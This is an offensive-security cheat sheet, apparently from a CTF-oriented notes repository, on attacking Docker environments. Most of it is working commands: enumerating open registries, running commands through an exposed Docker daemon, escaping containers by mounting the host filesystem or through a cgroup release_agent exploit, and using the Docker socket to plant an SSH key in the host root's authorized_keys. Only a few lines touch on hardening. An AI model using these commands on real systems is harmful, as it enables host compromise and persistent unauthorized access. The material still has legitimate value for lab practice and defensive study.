killchain-compendium/misc/level3_hypervisor/docker_sec/docker.md

4.2 KiB

Docker Vulnerabilities

Abusing Registry

  • Registry Doc
  • Registry is a json API endpoint
  • Private registry added in /etc/docker/daemon.json
  • Can be found by nmap as a service

Enumeration

  • General query
curl http://test.com:5000/v2/_catalog`
  • List tags
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
  • history section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>

Reversing Docker Images

dive <IMAGE-ID>

Uploading Images to Registry

  • Ever image has a latest tag
  • Upload modified docker image as latest
  • Article

RCE via Exposed Docker Daemon

  • Users inside the docker group may open tcp socket through docker

  • nmap -sV -p- <IP> -vv to find exposed tcp sockets via docker

  • Confirming via curl http://test.com:2375/version on open docker port

  • Execute commands on socket

    docker -H tcp://test.com:2375 ps
    docker -H tcp://test.com:2375 exec <container> <cmd>
    
  • root please

Escape Container via Exposed Docker Daemon

  • Looking for exposed docker sockets
find / -name "*sock"
groups
  • Mount the host volume and chroot to it, need alpine image.
docker images
```sh
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

or

docker run -v /:/host --rm -it <imageID> chroot /host/ bash

Shared Namespaces

  • Namespaces

  • Cgroups

  • OverlayFS

  • Requires root inside the container

  • Execute command

nsenter --target 1 --mount sh

Misconfiguration

  • Privileged container connect to the host directly, not through the docker engine
  • Execution of bins on the host from libs inside the container is possible
capsh --print
  • man capabilities

  • PoC

  • Exploit

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Check fdisk

  • fdisk -l and lsblk, host bulk device may be exposed
  • Mount the device
mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev

Creating a Container from inside another container

  • Needs root inside a container
  • Upload static curl
  • Check available images and containers
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
  • Inside the container as root
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
  • Return value is the ID
  • Start a container
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
  • Login in to the host via ssh

Dirty c0w

https://github.com/dirtycow/dirtycow.github.io

runC

CVE-2019-5736

Securing a Container

  • Least Privileges
  • Seccomp
  • Securing Registry via TLS

Checking if you are inside a container

  • Low process count
ps aux
  • .dockerenv in /
cd / && ls -lah
  • cgroups contain docker names
pwd /proc/1
cat cgroups